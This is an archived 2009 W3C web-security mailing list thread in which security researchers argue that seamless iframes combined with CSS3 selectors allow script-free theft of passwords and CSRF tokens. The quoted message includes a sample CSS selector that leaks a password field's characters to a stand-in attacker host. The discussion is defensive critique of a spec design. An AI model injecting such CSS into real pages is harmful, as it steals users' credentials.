W3C home > Mailing lists > Public > public-web-security@w3.org > December 2009

Re: Seamless iframes + CSS3 selectors = bad idea

From: Collin Jackson <w3c@collinjackson.com>
Date: Sat, 5 Dec 2009 10:05:25 -0800
Message-ID: <986207e70912051005p4b0d77a0xe856448aac75009@mail.gmail.com>
To: Adam Barth <w3c@adambarth.com>
Cc: sird@rckc.at, public-web-security@w3.org
A few thoughts:

* The password stealing attack can already be accomplished using the
iframe to create a login page and prompting the user to type their
password. It's not necessary to use CSS3 or seamless.
* If the password manager is used, CSS3 + seamless lets you steal the
password without user interaction.
* However, if you can inject arbitrary CSS3 and a seamless iframe into
a page, there's a good chance you can inject a password field, so this
password manager attack doesn't require seamless, just CSS3.
* Many webapps include a CSRF token in every page as a hidden form
field. If the page that allows CSS3 injection includes such a token,
you don't need seamless iframes to steal the token.

It seems like CSS3 is adding a lot of attack surface, sites may need
to block arbitrary CSS3 injection regardless of seamless. That is
unfortunate since browser vendors have been removing expression,
-moz-binding, and other features that make CSS injection dangerous.

On Sat, Dec 5, 2009 at 8:54 AM, Adam Barth <w3c@adambarth.com> wrote:
> I see.  The issue is that the attacker can inject CSS + iframes, but
> not script, into one page in an origin.  Now with seemless+CSS3, the
> attacker can steal information from the entire origin.  Very cool!
> Adam
> On Fri, Dec 4, 2009 at 6:39 AM, Eduardo Vela <sirdarckcat@gmail.com> wrote:
>> I sincerely understand why people want seamless iframes on HTML5.. I mean,
>> I've been there.. but sometimes the better way to do something is not to do
>> it.
>> The perfect example are seamless iframes (defined in html5) and CSS3
>> selectors.
>> I've showed (together with David Lindsay, and Gareth Heyes) expressed
>> several times that we think this is a bad idea.
>> We always receive the same answer "seamless iframes are same-origin!" and
>> believe me, I know.. but guess what? javascript is also same origin.. and it
>> also creates problems.
>> What I see with those awesome CSS3 selectors such as:
>> input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
>> create a new type of XSS attacks, and those are purely CSS based XSS
>> attacks.. without JS.. that will allow an attacker to read arbitrary files
>> from the page WITHOUT the need of JS.
>> I really hope people in here know that a cool feature is sometimes not such
>> a good idea, and hopefully, we can see how to resolve this issue..
>> References: The Sexy Assassin - BlueHat 2008 Presentation http://p42.us/css/
>> Favorite XSS - BlackHat 2009 Presentation http://p42.us/favxss/
>> Stefano Di Paola PoC http://www.wisec.it/CssSteal/frame.html
>> Greetings!!
>> -- Eduardo
>> http://www.sirdarckcat.net/
Received on Saturday, 5 December 2009 18:06:25 UTC

This archive was generated by hypermail 2.4.0 : Friday, 17 January 2020 18:09:23 UTC